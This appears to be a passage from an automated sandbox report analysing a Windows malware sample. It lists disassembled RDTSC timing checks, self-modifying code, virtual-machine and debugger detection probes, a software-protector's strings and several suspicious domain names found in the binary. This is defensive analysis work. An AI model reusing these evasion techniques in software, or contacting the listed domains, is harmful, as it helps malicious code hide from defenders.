    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31FB7 second address: D31FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31FBD second address: D31FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F72B8E40C00h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31FD6 second address: D31FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31FDA second address: D31FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D49AB1 second address: D49AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D523A7 second address: D523BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F72B8E40BFEh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D523BD second address: D523E2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72B9AA7986h 0x00000008 jmp 00007F72B9AA7995h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53CAE second address: D53CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F72B8E40BF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F04 second address: D59F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D59F08 second address: D59F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A069 second address: D5A083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F72B9AA7986h 0x0000000e jmp 00007F72B9AA798Ch 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A1ED second address: D5A1F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D240 second address: D5D244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D244 second address: D5D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D24A second address: D5D250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6124A second address: D61250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61250 second address: D6127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA7993h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F72B9AA7990h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6127C second address: D61293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C03h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61293 second address: D612A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F72B9AA798Ch 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D612A9 second address: D612B9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F72B8E40BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D612B9 second address: D612BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D612BD second address: D612DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F72B8E40BFBh 0x0000000e pushad 0x0000000f jmp 00007F72B8E40BFBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D612DF second address: D612E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF88 second address: D7DFB2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F72B8E40BF6h 0x00000008 jmp 00007F72B8E40C05h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 ja 00007F72B8E40BF6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FB37 second address: D7FB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FB40 second address: D7FB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7FB44 second address: D7FBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA7997h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F72B9AA7988h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F72B9AA798Ah 0x0000001b pushad 0x0000001c jmp 00007F72B9AA7992h 0x00000021 jbe 00007F72B9AA7986h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a pop eax 0x0000002b popad 0x0000002c jmp 00007F72B9AA798Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 push edi 0x00000034 pop edi 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99926 second address: D9993E instructions: 0x00000000 rdtsc 0x00000002 js 00007F72B8E40C0Ah 0x00000008 jmp 00007F72B8E40BFEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9993E second address: D99946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99946 second address: D9994A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9994A second address: D9995E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F72B9AA79A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9995E second address: D99962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D98894 second address: D988AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F72B9AA7990h 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99042 second address: D99046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D991AB second address: D991B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99470 second address: D99476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D995B3 second address: D995D6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72B9AA7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F72B9AA7991h 0x0000000f js 00007F72B9AA798Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D995D6 second address: D995ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jmp 00007F72B8E40BFDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D995ED second address: D99607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F72B9AA7995h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99607 second address: D99613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F72B8E40BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99613 second address: D99617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D737 second address: D9D761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72B8E40C08h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jnp 00007F72B8E40BF6h 0x00000016 pop edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D81F second address: D9D838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F72B9AA7992h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D838 second address: D9D83C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DCB2 second address: D9DCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DCB6 second address: D9DCE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 or dword ptr [ebp+122D2537h], ecx 0x0000000e or dword ptr [ebp+122D25D4h], ecx 0x00000014 push dword ptr [ebp+12464262h] 0x0000001a mov dx, 1AD2h 0x0000001e push 15991B00h 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 jc 00007F72B8E40BF6h 0x0000002c pop esi 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DCE3 second address: D9DCF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B9AA798Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F14 second address: DA0F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F1A second address: DA0F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F1E second address: DA0F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F38 second address: DA0F42 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72B9AA798Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F42 second address: DA0F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F72B8E40C07h 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F72B8E40BF6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0F68 second address: DA0F96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F72B9AA798Ah 0x0000000f jmp 00007F72B9AA7992h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D07 second address: 2EB0D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D0B second address: 2EB0D1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA798Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D1E second address: 2EB0D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007F72B8E40BFEh 0x00000014 test ecx, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F72B8E40BFEh 0x0000001d and si, 1A78h 0x00000022 jmp 00007F72B8E40BFBh 0x00000027 popfd 0x00000028 popad 0x00000029 jns 00007F72B8E40C4Bh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D7F second address: 2EB0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D83 second address: 2EB0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D87 second address: 2EB0D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0D8D second address: 2EB0DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0DB2 second address: 2EB0DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2EB0DB8 second address: 2EB0DED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax+00000860h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F72B8E40C07h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4CD9 second address: CB4CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0022 second address: 50E009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F72B8E40C09h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov si, 0443h 0x00000015 pushfd 0x00000016 jmp 00007F72B8E40C08h 0x0000001b adc cx, 6108h 0x00000020 jmp 00007F72B8E40BFBh 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c call 00007F72B8E40BFBh 0x00000031 pop esi 0x00000032 movsx edx, cx 0x00000035 popad 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E009D second address: 50E00D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 04A4EE14h 0x00000008 pushfd 0x00000009 jmp 00007F72B9AA798Dh 0x0000000e or cx, CAD6h 0x00000013 jmp 00007F72B9AA7991h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B03D45 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CA565B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CD0EFE instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CAF559 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D3471C instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 7760Thread sleep time: -90000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
    Source: file.exe, file.exe, 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.9.drBinary or memory string: VMware
    Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000004.00000003.1321868855.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.000000000113E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.9.drBinary or memory string: vmci.sys
    Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.9.drBinary or memory string: VMware20,1
    Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
    Source: file.exe, 00000004.00000003.1321750221.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1598907170.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
    Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00AE00D0 LdrInitializeThunk,4_2_00AE00D0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exe, 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: CProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
